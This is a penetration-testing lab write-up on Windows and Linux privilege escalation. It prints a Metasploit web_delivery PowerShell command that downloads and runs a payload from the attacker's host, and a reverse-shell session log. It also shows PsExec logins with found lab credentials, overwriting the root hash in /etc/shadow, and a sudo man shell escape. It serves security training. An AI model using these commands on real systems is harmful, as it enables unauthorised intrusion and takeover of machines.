4 - Privilege Escalation

sds

Windows

In order to elevate your privileges on Windows, you must first, identify privilege escalation vulnerabilities that exist on the target system.

This process will differ greatly based on the type of target you gain access to. Privilege escalation on Windows can be performed through a plethora of techniques based on the

version of Windows
system’s unique configuration.

This process can be quite tedious and time consuming and as a result, it is recommended to automate the processes of identifying privilege escalation vulnerabilities. This can be done through the use of various automation scripts like PrivescCheck.

PrivescCheck - This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation.

The script needs to be executed on the target machine.

GitHub - itm4n/PrivescCheck: Privilege Escalation Enumeration Script for WindowsGitHub

🔬Windows: PrivescCheck

In this lab you are also provided with access to a victim' session via GUI.

Exploit the target

Since the target system doesn't have vulnerable services and we can directly interact with the target system, we can exploit the latter with the module

exploit/multi/script/web_delivery

which will start a web server (on LHOST) hosting a malicious payload. Running the exploit will generate a Powershell command that, executed on the target system, will download the payload from the said web server and then executed, providing you with a session on the target machine.

Set:

Variable	Value
target	PSH\ (Binary)
payload	windows/shell/reverse_tcp
PSH-EncodedCommand	false
LHOST	eth1

Variable

Value

target

PSH\ (Binary)

payload

windows/shell/reverse_tcp

PSH-EncodedCommand

false

LHOST

eth1

Run the script, copy the Powershell command it generates and run in over to the target machine: on your msfconsole you should get a shell (nonn-interactive).

msf5 exploit(multi/script/web_delivery) > [*] Local IP: http://10.10.24.6:8080/RtZZRZ
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$z="echo ($env:temp+'\ZxC0TeX3.exe')"; (new-object System.Net.WebClient).DownloadFile('http://10.10.24.6:8080/RtZZRZ', $z); invoke-item $z
[*] 10.2.30.5        web_delivery - Delivering Payload (73802 bytes)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.2.30.5
[*] Command shell session 1 opened (10.10.24.6:4444 -> 10.2.30.5:49762) at 2023-07-10 20:43:13 +0530

Upgrade the shell

Put the shell in background and use the module

post/multi/manage/shell_to_meterpreter

to upgrade the shell to a meterpreter session, setting

Variable	Value
LHOST	eth1
SESSION	1
WIN_TRANSFER	VBS

Variable

Value

LHOST

eth1

SESSION

WIN_TRANSFER

VBS

Run PrivescCheck

After obtaining the meterpreter session, migrate to explorer.exe to have a more stable session, then navigate to C:\Users\student\Desktop\PrivescCheck and switch from meterpreter to "shell mode".

Then run the ps1 script following the instructions on the repository page, in our case

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

and let it run. You will find a pair of credentials adminstrator/hello_123321.

Login to the target system and find tha flag

We can login to the target system via PsExec using

python script (psexec.py)
metasploit module

psexec.py administrator@<target IP>

You can then find the flag with the command

dir /s /b flag.txt

This command will search for the file "flag.txt" in the current directory and all subdirectories (/s option). The /b option is used to display only the file names without additional information.

If the file is found, the command prompt will display the full path to the file. If the file is not found, there will be no output.

use exploit/windows/smb/psexec

Set:

Variable	Value
LPORT	just make sure it's different from the ones in the other active sessions
RHOSTS	target IP
SMBUser	administrator
SMBPass	hello_123321

Variable

Value

LPORT

just make sure it's different from the ones in the other active sessions

RHOSTS

target IP

SMBUser

administrator

SMBPass

hello_123321

Linux

To identify Linux vulnerabilities you can use LinEnum.

Checks to do first:

identify yourself (whoami)
cat /etc/passwd to find out other user account
list all groups your user belongs to (groups)
list all groups in the system (cat /etc/group)

Files with weak permissions

The goal here is to identify those files that should have root permissions (r+w) but that are instead misconfigured, allowing reading and/or writing to non-root users.

To find these files, run the command

find / -not -type l -perm -o+w 2>/dev/null

find: It is the command used to search for files and directories within a given directory hierarchy.
/: It specifies the starting point for the search. In this case, it is the root directory, indicating that the search will cover the entire file system.
-not: It is a logical operator that negates the expression that follows it.
-type l: This specifies the type of file to search for. In this case, it looks for symbolic links.
-perm -o+w: This expression specifies the permissions of the files to search for. It searches for files that have write permission for others (users who are not the owner or in the same group).
2>/dev/null: discard result lines with errors

Putting it all together, the command find / -not -type l -perm -o+w searches for files within the entire file system, excluding symbolic links, that have write permission for others.

Example

From the results of the previous command, we found that /etc/shadow was misconfigured: it means we can change the password of the root user.

To generate a new password (in our case password), use the command

openssl passwd -1 -salt abc password

openssl: It is a command-line tool used for various cryptographic operations and handling SSL/TLS protocols.
passwd: It is a subcommand of OpenSSL used for generating password hashes.
-1: This option specifies the algorithm to use for password hashing. In this case, -1 indicates the MD5-based algorithm (the weakest one).
-salt abc: This option sets the salt value to be used in the password hashing process. The salt is a random value that adds complexity to the password hash.
password: This is the password for which the hash will be generated.

In summary, the command openssl passwd -1 -salt abc password generates an MD5-based password hash for the password "password" using the salt value "abc."

Now copy the generated hash and paste it in place of the * after root:

student@attackdefense:~$ cat /etc/shadow
root:*:17764:0:99999:7:::
daemon:*:17764:0:99999:7:::

Switch to the root user with the su command and that's it!

Misconfigured SUDO privileges

Check what commands the current user can execute with SUDO privileges:

sudo -l

student@attackdefense:~$ sudo -l
Matching Defaults entries for student on attackdefense:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User student may run the following commands on attackdefense:
    (root) NOPASSWD: /usr/bin/man

In this example, the user student can run the man command with SUDO privileges without entering the root password.

As you can see from here, you can spawn a shell within man: doing it as you were root, will start a privileged shell!

man <whatever command>
!/bin/bash

An excellent resource to find out privesc vectors on binaries is GTFOBins.

Previous3 - Upgrading Shells Next5 - Persistence

Last updated 1 year ago